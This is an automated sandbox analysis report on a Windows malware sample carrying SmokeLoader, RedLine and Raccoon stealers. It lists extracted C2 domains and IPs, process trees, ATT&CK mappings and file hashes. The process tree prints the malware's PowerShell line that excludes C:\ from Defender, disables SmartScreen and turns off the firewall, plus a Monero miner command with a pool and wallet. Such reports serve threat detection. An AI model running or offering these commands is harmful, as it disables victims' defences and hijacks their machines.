Analysis

  • max time kernel
    132s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    26-09-2021 09:02

General

  • Target

    924b06fed5002d7dbc6004401b7a519f.exe

  • Size

    145KB

  • MD5

    924b06fed5002d7dbc6004401b7a519f

  • SHA1

    669962749b03a129e44c6eec9ef2804ec31493f4

  • SHA256

    858a2b253b7e26188cffde5e58dfb08e4a26ef393f962958d6a1615c93f9917e

  • SHA512

    7b9e2c6765077ebe4e438e86f805792b02e18e2cc4519184c80db4a975db40dec9969a950451f1cdce95a0648f8ff2347fce619e8b40551319ee69e5f577b486

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://naghenrietti1.top/

http://kimballiett2.top/

http://xadriettany3.top/

http://jebeccallis4.top/

http://nityanneron5.top/

http://umayaniela6.top/

http://lynettaram7.top/

http://sadineyalas8.top/

http://geenaldencia9.top/

http://aradysiusep10.top/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

installszxc

C2

138.124.186.2:27999

Extracted

Family

redline

Botnet

qq

C2

135.181.142.223:30397

Extracted

Family

raccoon

Botnet

5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4

Attributes
  • url4cnc

    https://t.me/agrybirdsgamerept

rc4.plain
rc4.plain

Signatures

  • Modifies security service 2 TTPs 1 IoCs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 16 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 10 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 10 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 26 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\924b06fed5002d7dbc6004401b7a519f.exe
    "C:\Users\Admin\AppData\Local\Temp\924b06fed5002d7dbc6004401b7a519f.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1612
    • C:\Users\Admin\AppData\Local\Temp\924b06fed5002d7dbc6004401b7a519f.exe
      "C:\Users\Admin\AppData\Local\Temp\924b06fed5002d7dbc6004401b7a519f.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1844
  • C:\Users\Admin\AppData\Local\Temp\B6C0.exe
    C:\Users\Admin\AppData\Local\Temp\B6C0.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1528
    • C:\Users\Admin\AppData\Local\Temp\B6C0.exe
      C:\Users\Admin\AppData\Local\Temp\B6C0.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:1228
  • C:\Users\Admin\AppData\Local\Temp\B9CD.exe
    C:\Users\Admin\AppData\Local\Temp\B9CD.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2008
    • C:\Users\Admin\AppData\Local\Temp\B9CD.exe
      C:\Users\Admin\AppData\Local\Temp\B9CD.exe
      2⤵
      • Executes dropped EXE
      PID:1976
    • C:\Users\Admin\AppData\Local\Temp\B9CD.exe
      C:\Users\Admin\AppData\Local\Temp\B9CD.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1764
  • C:\Users\Admin\AppData\Local\Temp\BFE6.exe
    C:\Users\Admin\AppData\Local\Temp\BFE6.exe
    1⤵
    • Executes dropped EXE
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    PID:848
  • C:\Users\Admin\AppData\Local\Temp\C9D6.exe
    C:\Users\Admin\AppData\Local\Temp\C9D6.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1884
    • C:\ProgramData\Stub.exe
      "C:\ProgramData\Stub.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:676
  • C:\Users\Admin\AppData\Local\Temp\D971.exe
    C:\Users\Admin\AppData\Local\Temp\D971.exe
    1⤵
    • Executes dropped EXE
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    PID:1592
  • C:\Users\Admin\AppData\Local\Temp\E1AC.exe
    C:\Users\Admin\AppData\Local\Temp\E1AC.exe
    1⤵
    • Executes dropped EXE
    • Checks BIOS information in registry
    • Loads dropped DLL
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1044
    • C:\Users\Admin\AppData\Local\Temp\Zenar.exe
      "C:\Users\Admin\AppData\Local\Temp\Zenar.exe"
      2⤵
      • Executes dropped EXE
      • Drops startup file
      • Loads dropped DLL
      • Modifies system certificate store
      • Suspicious use of WriteProcessMemory
      PID:2232
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(exit)
        3⤵
        • Modifies security service
        • Loads dropped DLL
        • Suspicious use of AdjustPrivilegeToken
        PID:2472
        • C:\ProgramData\UpSys.exe
          "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2656
          • C:\ProgramData\UpSys.exe
            "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2708
            • C:\ProgramData\UpSys.exe
              "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
              6⤵
              • Executes dropped EXE
              PID:2780
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
          4⤵
            PID:2724
        • C:\ProgramData\Systemd\Microsoft_Edge.exe
          -o pool.minexmr.com:4444 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQnLV2S6XfF4NcZDZ76 -p password666 --coin=XMR --cpu-max-threads-hint=35
          3⤵
          • Executes dropped EXE
          • Checks BIOS information in registry
          • Checks whether UAC is enabled
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of AdjustPrivilegeToken
          PID:2860
    • C:\Users\Admin\AppData\Local\Temp\E526.exe
      C:\Users\Admin\AppData\Local\Temp\E526.exe
      1⤵
      • Executes dropped EXE
      PID:1376

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Modify Existing Service

    2
    T1031

    Defense Evasion

    Modify Registry

    2
    T1112

    Virtualization/Sandbox Evasion

    1
    T1497

    Install Root Certificate

    1
    T1130

    Credential Access

    Credentials in Files

    2
    T1081

    Discovery

    Query Registry

    4
    T1012

    Virtualization/Sandbox Evasion

    1
    T1497

    System Information Discovery

    4
    T1082

    Peripheral Device Discovery

    1
    T1120

    Collection

    Data from Local System

    2
    T1005

    Command and Control

    Web Service

    1
    T1102

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\Stub.exe
      MD5

      d04d4d9896a08dc0ec357ca574814a1b

      SHA1

      c505429beddc51abc26c29e5ee96df5f44a8f171

      SHA256

      dff7a52513235d80ee44e0a38c1b9078787d0482af66646b4a84c43bc539e2b3

      SHA512

      7cc60ebe0ce9966247868fa679076cc9258bcaf2f3b036249143c6d2eac41ef6d3396503b6434173b41cc6dc393b6cf58ed8919f3d8bcc5c44a03a59c0aa4cc0

    • C:\ProgramData\Stub.exe
      MD5

      d04d4d9896a08dc0ec357ca574814a1b

      SHA1

      c505429beddc51abc26c29e5ee96df5f44a8f171

      SHA256

      dff7a52513235d80ee44e0a38c1b9078787d0482af66646b4a84c43bc539e2b3

      SHA512

      7cc60ebe0ce9966247868fa679076cc9258bcaf2f3b036249143c6d2eac41ef6d3396503b6434173b41cc6dc393b6cf58ed8919f3d8bcc5c44a03a59c0aa4cc0

    • C:\ProgramData\Systemd\Microsoft_Edge.exe
      MD5

      dd65d21cce0fb19114b0a0aadedf8e00

      SHA1

      2f147e1d503561b4fdaa2e0adc2191ab73184b3c

      SHA256

      34db189b47a0568cefceaf3e00968482896969132d2f77ebe42e4a9e91db2cdc

      SHA512

      df98ebb4c0ca4bae827ade7026d39e29b144e0de91e83c77476739bd43d3e2709f34cf618efe6ea22a89d3ae59e7b29f5202df15a3eddb0d5ffee18b6e217444

    • C:\ProgramData\UpSys.exe
      MD5

      efe5769e37ba37cf4607cb9918639932

      SHA1

      f24ca204af2237a714e8b41d54043da7bbe5393b

      SHA256

      5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

      SHA512

      33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

    • C:\ProgramData\UpSys.exe
      MD5

      efe5769e37ba37cf4607cb9918639932

      SHA1

      f24ca204af2237a714e8b41d54043da7bbe5393b

      SHA256

      5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

      SHA512

      33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

    • C:\ProgramData\UpSys.exe
      MD5

      efe5769e37ba37cf4607cb9918639932

      SHA1

      f24ca204af2237a714e8b41d54043da7bbe5393b

      SHA256

      5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

      SHA512

      33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

    • C:\ProgramData\UpSys.exe
      MD5

      efe5769e37ba37cf4607cb9918639932

      SHA1

      f24ca204af2237a714e8b41d54043da7bbe5393b

      SHA256

      5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

      SHA512

      33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

    • C:\Users\Admin\AppData\Local\Temp\B6C0.exe
      MD5

      924b06fed5002d7dbc6004401b7a519f

      SHA1

      669962749b03a129e44c6eec9ef2804ec31493f4

      SHA256

      858a2b253b7e26188cffde5e58dfb08e4a26ef393f962958d6a1615c93f9917e

      SHA512

      7b9e2c6765077ebe4e438e86f805792b02e18e2cc4519184c80db4a975db40dec9969a950451f1cdce95a0648f8ff2347fce619e8b40551319ee69e5f577b486

    • C:\Users\Admin\AppData\Local\Temp\B6C0.exe
      MD5

      924b06fed5002d7dbc6004401b7a519f

      SHA1

      669962749b03a129e44c6eec9ef2804ec31493f4

      SHA256

      858a2b253b7e26188cffde5e58dfb08e4a26ef393f962958d6a1615c93f9917e

      SHA512

      7b9e2c6765077ebe4e438e86f805792b02e18e2cc4519184c80db4a975db40dec9969a950451f1cdce95a0648f8ff2347fce619e8b40551319ee69e5f577b486

    • C:\Users\Admin\AppData\Local\Temp\B6C0.exe
      MD5

      924b06fed5002d7dbc6004401b7a519f

      SHA1

      669962749b03a129e44c6eec9ef2804ec31493f4

      SHA256

      858a2b253b7e26188cffde5e58dfb08e4a26ef393f962958d6a1615c93f9917e

      SHA512

      7b9e2c6765077ebe4e438e86f805792b02e18e2cc4519184c80db4a975db40dec9969a950451f1cdce95a0648f8ff2347fce619e8b40551319ee69e5f577b486

    • C:\Users\Admin\AppData\Local\Temp\B9CD.exe
      MD5

      8df6ef1e48d3a33226c91bf4a93b0c8a

      SHA1

      e70ed102babe577b9481be056cb8cc0564bdc669

      SHA256

      5c08f9fc48f867d84001477316d7235e73483cc3fc6ac0f94ebd68564da016cd

      SHA512

      d5e021bfd927ebd9ce585bafe88970ea576f4e27752940e087a03d18568787d7442735495703cd8c02a4988e4ab13fcfc089956c9b109d250227b947b8dab1d0

    • C:\Users\Admin\AppData\Local\Temp\B9CD.exe
      MD5

      8df6ef1e48d3a33226c91bf4a93b0c8a

      SHA1

      e70ed102babe577b9481be056cb8cc0564bdc669

      SHA256

      5c08f9fc48f867d84001477316d7235e73483cc3fc6ac0f94ebd68564da016cd

      SHA512

      d5e021bfd927ebd9ce585bafe88970ea576f4e27752940e087a03d18568787d7442735495703cd8c02a4988e4ab13fcfc089956c9b109d250227b947b8dab1d0

    • C:\Users\Admin\AppData\Local\Temp\B9CD.exe
      MD5

      8df6ef1e48d3a33226c91bf4a93b0c8a

      SHA1

      e70ed102babe577b9481be056cb8cc0564bdc669

      SHA256

      5c08f9fc48f867d84001477316d7235e73483cc3fc6ac0f94ebd68564da016cd

      SHA512

      d5e021bfd927ebd9ce585bafe88970ea576f4e27752940e087a03d18568787d7442735495703cd8c02a4988e4ab13fcfc089956c9b109d250227b947b8dab1d0

    • C:\Users\Admin\AppData\Local\Temp\B9CD.exe
      MD5

      8df6ef1e48d3a33226c91bf4a93b0c8a

      SHA1

      e70ed102babe577b9481be056cb8cc0564bdc669

      SHA256

      5c08f9fc48f867d84001477316d7235e73483cc3fc6ac0f94ebd68564da016cd

      SHA512

      d5e021bfd927ebd9ce585bafe88970ea576f4e27752940e087a03d18568787d7442735495703cd8c02a4988e4ab13fcfc089956c9b109d250227b947b8dab1d0

    • C:\Users\Admin\AppData\Local\Temp\BFE6.exe
      MD5

      f853fe6b26dcf67545675aec618f3a99

      SHA1

      a70f5ffd6dac789909ccb19dfb31272a520c7bc0

      SHA256

      091ba447af0f0cabd66484b3f81e909ca01be4e27db9ccf42779174e04dad57a

      SHA512

      4764e88d5bdcf88447e0782c88fec18f5a1083b460829e16635a8602173f1a6813d3ff93866bef587f9f9b682451d4386bd765b2da580c69f7483b48f074bbd3

    • C:\Users\Admin\AppData\Local\Temp\C9D6.exe
      MD5

      f565831d19adf8e031e0eacccd65d339

      SHA1

      a20c300ac91be8f9f3497d11144ed511a31b7962

      SHA256

      6d4aeb893fda30cf349de8af13358009206ea3c4d094e771a3bd777aa4bd4a30

      SHA512

      2c75feacccce0b996e1773803ae7aa96d8236752fd89d995beedb66f0a9fc2b79cbc20c1f7e7c4e2d0176a116dd660625d54d3ceead876cdc0ef1cf334bb719e

    • C:\Users\Admin\AppData\Local\Temp\C9D6.exe
      MD5

      f565831d19adf8e031e0eacccd65d339

      SHA1

      a20c300ac91be8f9f3497d11144ed511a31b7962

      SHA256

      6d4aeb893fda30cf349de8af13358009206ea3c4d094e771a3bd777aa4bd4a30

      SHA512

      2c75feacccce0b996e1773803ae7aa96d8236752fd89d995beedb66f0a9fc2b79cbc20c1f7e7c4e2d0176a116dd660625d54d3ceead876cdc0ef1cf334bb719e

    • C:\Users\Admin\AppData\Local\Temp\D971.exe
      MD5

      a8f923639f9b10392a12e409a4b65d80

      SHA1

      5dc1b8d6751f37ac2cfa526e35de2bedac479332

      SHA256

      ec9c47685aaf2711429538df1efddeace58992d79f685387778f0a99af4cdbe5

      SHA512

      57a34ad6388e675c69dcce9a5a8761d9d7ec80be3229545b82dfd8bf16f0702ccdf6a51b8316d569f10f8a6e2e9b9e78ee07227b73d356984a10061b63921214

    • C:\Users\Admin\AppData\Local\Temp\E1AC.exe
      MD5

      72ebda1e2c91ad8b5b1bfb289ffa77e0

      SHA1

      5410014afec276692910ded77d532775de92e699

      SHA256

      598abf20dbea3d5ea767057ca90aba6ddfd051d1074684b9099b47037af5bb1b

      SHA512

      75c97d3c35c90627dfd52dfdfe2539bdfe297cc0ca04a117aa5df294af8857e4fddf0cae527d2a4bdf12cd4a6666dc3e64f268f1e68f8276dd39950f77357c63

    • C:\Users\Admin\AppData\Local\Temp\E526.exe
      MD5

      d97c34cf8df6b94a767a4de88f38af86

      SHA1

      90af7b45728e4be0f403f097e1687fcc3c1053b9

      SHA256

      a79d76b9e2dc0e30bf14ba869fa8627080f88d3bdfd96c7e6631b707169ea359

      SHA512

      ef1558c23ec769c3212d48da8afc8121f484b26809e21864512d7f9e5cbf2502254d426d6155a9c6534351f66f73c95b64ff8154cc39512bc5d538fed7b636c3

    • C:\Users\Admin\AppData\Local\Temp\Zenar.exe
      MD5

      844b7e033c078ed67b52558b5d891741

      SHA1

      cff2a6b3b726455b9ed898aa766f2363189642bc

      SHA256

      eff8a484eafd5ebdf57845e6a656793520bdddf5469ea4a95eaa578e8bca6c50

      SHA512

      537487e3d6b6be107530e36547f3b66d61cce29d127ac1ce9ad34d2eb1e60ddb4d368a6c8e1366ef307982ffba507aff87ca2a9590e9fb58ad74b7c628a6dfca

    • C:\Users\Admin\AppData\Local\Temp\Zenar.exe
      MD5

      844b7e033c078ed67b52558b5d891741

      SHA1

      cff2a6b3b726455b9ed898aa766f2363189642bc

      SHA256

      eff8a484eafd5ebdf57845e6a656793520bdddf5469ea4a95eaa578e8bca6c50

      SHA512

      537487e3d6b6be107530e36547f3b66d61cce29d127ac1ce9ad34d2eb1e60ddb4d368a6c8e1366ef307982ffba507aff87ca2a9590e9fb58ad74b7c628a6dfca

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk
      MD5

      262173c2c712da762e1a393941bd0856

      SHA1

      a1a35f89d6dd800fb22767ac9584d1f64bef862c

      SHA256

      ce5f1f076b9268819522f6010f20233470b59fa6d59852a764003830b2c48270

      SHA512

      d6a7d8f9f74f2449acd81c40288c4fa473502fbfe565ffbc613d99187eee64ec859706e33f526e745a8cf705de07daac2a78794b2fbe5d8ffe7a560f1debc0cc

    • \ProgramData\MicrosoftNetwork\System.exe
      MD5

      844b7e033c078ed67b52558b5d891741

      SHA1

      cff2a6b3b726455b9ed898aa766f2363189642bc

      SHA256

      eff8a484eafd5ebdf57845e6a656793520bdddf5469ea4a95eaa578e8bca6c50

      SHA512

      537487e3d6b6be107530e36547f3b66d61cce29d127ac1ce9ad34d2eb1e60ddb4d368a6c8e1366ef307982ffba507aff87ca2a9590e9fb58ad74b7c628a6dfca

    • \ProgramData\Stub.exe
      MD5

      d04d4d9896a08dc0ec357ca574814a1b

      SHA1

      c505429beddc51abc26c29e5ee96df5f44a8f171

      SHA256

      dff7a52513235d80ee44e0a38c1b9078787d0482af66646b4a84c43bc539e2b3

      SHA512

      7cc60ebe0ce9966247868fa679076cc9258bcaf2f3b036249143c6d2eac41ef6d3396503b6434173b41cc6dc393b6cf58ed8919f3d8bcc5c44a03a59c0aa4cc0

    • \ProgramData\Systemd\Microsoft_Edge.exe
      MD5

      dd65d21cce0fb19114b0a0aadedf8e00

      SHA1

      2f147e1d503561b4fdaa2e0adc2191ab73184b3c

      SHA256

      34db189b47a0568cefceaf3e00968482896969132d2f77ebe42e4a9e91db2cdc

      SHA512

      df98ebb4c0ca4bae827ade7026d39e29b144e0de91e83c77476739bd43d3e2709f34cf618efe6ea22a89d3ae59e7b29f5202df15a3eddb0d5ffee18b6e217444

    • \ProgramData\Systemd\Microsoft_Edge.exe
      MD5

      dd65d21cce0fb19114b0a0aadedf8e00

      SHA1

      2f147e1d503561b4fdaa2e0adc2191ab73184b3c

      SHA256

      34db189b47a0568cefceaf3e00968482896969132d2f77ebe42e4a9e91db2cdc

      SHA512

      df98ebb4c0ca4bae827ade7026d39e29b144e0de91e83c77476739bd43d3e2709f34cf618efe6ea22a89d3ae59e7b29f5202df15a3eddb0d5ffee18b6e217444

    • \ProgramData\UpSys.exe
      MD5

      efe5769e37ba37cf4607cb9918639932

      SHA1

      f24ca204af2237a714e8b41d54043da7bbe5393b

      SHA256

      5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

      SHA512

      33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

    • \Users\Admin\AppData\Local\Temp\B6C0.exe
      MD5

      924b06fed5002d7dbc6004401b7a519f

      SHA1

      669962749b03a129e44c6eec9ef2804ec31493f4

      SHA256

      858a2b253b7e26188cffde5e58dfb08e4a26ef393f962958d6a1615c93f9917e

      SHA512

      7b9e2c6765077ebe4e438e86f805792b02e18e2cc4519184c80db4a975db40dec9969a950451f1cdce95a0648f8ff2347fce619e8b40551319ee69e5f577b486

    • \Users\Admin\AppData\Local\Temp\B9CD.exe
      MD5

      8df6ef1e48d3a33226c91bf4a93b0c8a

      SHA1

      e70ed102babe577b9481be056cb8cc0564bdc669

      SHA256

      5c08f9fc48f867d84001477316d7235e73483cc3fc6ac0f94ebd68564da016cd

      SHA512

      d5e021bfd927ebd9ce585bafe88970ea576f4e27752940e087a03d18568787d7442735495703cd8c02a4988e4ab13fcfc089956c9b109d250227b947b8dab1d0

    • \Users\Admin\AppData\Local\Temp\B9CD.exe
      MD5

      8df6ef1e48d3a33226c91bf4a93b0c8a

      SHA1

      e70ed102babe577b9481be056cb8cc0564bdc669

      SHA256

      5c08f9fc48f867d84001477316d7235e73483cc3fc6ac0f94ebd68564da016cd

      SHA512

      d5e021bfd927ebd9ce585bafe88970ea576f4e27752940e087a03d18568787d7442735495703cd8c02a4988e4ab13fcfc089956c9b109d250227b947b8dab1d0

    • \Users\Admin\AppData\Local\Temp\Zenar.exe
      MD5

      844b7e033c078ed67b52558b5d891741

      SHA1

      cff2a6b3b726455b9ed898aa766f2363189642bc

      SHA256

      eff8a484eafd5ebdf57845e6a656793520bdddf5469ea4a95eaa578e8bca6c50

      SHA512

      537487e3d6b6be107530e36547f3b66d61cce29d127ac1ce9ad34d2eb1e60ddb4d368a6c8e1366ef307982ffba507aff87ca2a9590e9fb58ad74b7c628a6dfca

    • \Users\Admin\AppData\Local\Temp\Zenar.exe
      MD5

      844b7e033c078ed67b52558b5d891741

      SHA1

      cff2a6b3b726455b9ed898aa766f2363189642bc

      SHA256

      eff8a484eafd5ebdf57845e6a656793520bdddf5469ea4a95eaa578e8bca6c50

      SHA512

      537487e3d6b6be107530e36547f3b66d61cce29d127ac1ce9ad34d2eb1e60ddb4d368a6c8e1366ef307982ffba507aff87ca2a9590e9fb58ad74b7c628a6dfca

    • memory/676-113-0x0000000002100000-0x0000000002101000-memory.dmp
      Filesize

      4KB

    • memory/676-100-0x0000000000000000-mapping.dmp
    • memory/676-103-0x0000000000100000-0x0000000000101000-memory.dmp
      Filesize

      4KB

    • memory/848-72-0x0000000000000000-mapping.dmp
    • memory/848-82-0x0000000001280000-0x0000000001281000-memory.dmp
      Filesize

      4KB

    • memory/848-86-0x0000000000410000-0x0000000000411000-memory.dmp
      Filesize

      4KB

    • memory/1044-124-0x0000000005010000-0x0000000005011000-memory.dmp
      Filesize

      4KB

    • memory/1044-116-0x0000000000000000-mapping.dmp
    • memory/1044-120-0x0000000000F40000-0x0000000000F41000-memory.dmp
      Filesize

      4KB

    • memory/1228-77-0x0000000000402FA5-mapping.dmp
    • memory/1272-64-0x0000000004B90000-0x0000000004BA6000-memory.dmp
      Filesize

      88KB

    • memory/1272-95-0x0000000002DE0000-0x0000000002DF6000-memory.dmp
      Filesize

      88KB

    • memory/1376-127-0x0000000000400000-0x00000000004F2000-memory.dmp
      Filesize

      968KB

    • memory/1376-126-0x00000000002E0000-0x0000000000370000-memory.dmp
      Filesize

      576KB

    • memory/1376-122-0x0000000000000000-mapping.dmp
    • memory/1528-65-0x0000000000000000-mapping.dmp
    • memory/1592-115-0x0000000000DE0000-0x0000000000DE1000-memory.dmp
      Filesize

      4KB

    • memory/1592-111-0x0000000000EB0000-0x0000000000EB1000-memory.dmp
      Filesize

      4KB

    • memory/1592-96-0x0000000000000000-mapping.dmp
    • memory/1612-60-0x0000000000220000-0x0000000000229000-memory.dmp
      Filesize

      36KB

    • memory/1764-105-0x0000000000400000-0x0000000000422000-memory.dmp
      Filesize

      136KB

    • memory/1764-114-0x0000000004790000-0x0000000004791000-memory.dmp
      Filesize

      4KB

    • memory/1764-108-0x0000000000400000-0x0000000000422000-memory.dmp
      Filesize

      136KB

    • memory/1764-106-0x000000000041C5CE-mapping.dmp
    • memory/1844-61-0x0000000000400000-0x0000000000409000-memory.dmp
      Filesize

      36KB

    • memory/1844-62-0x0000000000402FA5-mapping.dmp
    • memory/1844-63-0x0000000075D51000-0x0000000075D53000-memory.dmp
      Filesize

      8KB

    • memory/1884-92-0x0000000000290000-0x0000000000291000-memory.dmp
      Filesize

      4KB

    • memory/1884-87-0x0000000000000000-mapping.dmp
    • memory/1884-90-0x0000000000960000-0x0000000000961000-memory.dmp
      Filesize

      4KB

    • memory/2008-67-0x0000000000000000-mapping.dmp
    • memory/2008-70-0x0000000000F40000-0x0000000000F41000-memory.dmp
      Filesize

      4KB

    • memory/2008-84-0x0000000004910000-0x0000000004911000-memory.dmp
      Filesize

      4KB

    • memory/2232-132-0x000007FEFBC31000-0x000007FEFBC33000-memory.dmp
      Filesize

      8KB

    • memory/2232-129-0x0000000000000000-mapping.dmp
    • memory/2472-147-0x000000001A9A0000-0x000000001A9A1000-memory.dmp
      Filesize

      4KB

    • memory/2472-134-0x0000000000000000-mapping.dmp
    • memory/2472-160-0x0000000002800000-0x0000000002801000-memory.dmp
      Filesize

      4KB

    • memory/2472-144-0x00000000027B0000-0x00000000027B1000-memory.dmp
      Filesize

      4KB

    • memory/2472-143-0x00000000024B0000-0x00000000024B1000-memory.dmp
      Filesize

      4KB

    • memory/2472-142-0x000000001ACD4000-0x000000001ACD6000-memory.dmp
      Filesize

      8KB

    • memory/2472-166-0x000000001C470000-0x000000001C471000-memory.dmp
      Filesize

      4KB

    • memory/2472-140-0x000000001ACD0000-0x000000001ACD2000-memory.dmp
      Filesize

      8KB

    • memory/2472-159-0x00000000027F0000-0x00000000027F1000-memory.dmp
      Filesize

      4KB

    • memory/2472-139-0x0000000002550000-0x0000000002551000-memory.dmp
      Filesize

      4KB

    • memory/2472-138-0x000000001AD50000-0x000000001AD51000-memory.dmp
      Filesize

      4KB

    • memory/2472-137-0x0000000002470000-0x0000000002471000-memory.dmp
      Filesize

      4KB

    • memory/2656-163-0x0000000000000000-mapping.dmp
    • memory/2724-169-0x0000000000000000-mapping.dmp
    • memory/2860-175-0x0000000000000000-mapping.dmp
    • memory/2860-177-0x0000000000400000-0x00000000011F4000-memory.dmp
      Filesize

      14.0MB

    • memory/2860-178-0x00000000003E0000-0x0000000000400000-memory.dmp
      Filesize

      128KB

    • memory/2860-179-0x00000000032D0000-0x00000000032F0000-memory.dmp
      Filesize

      128KB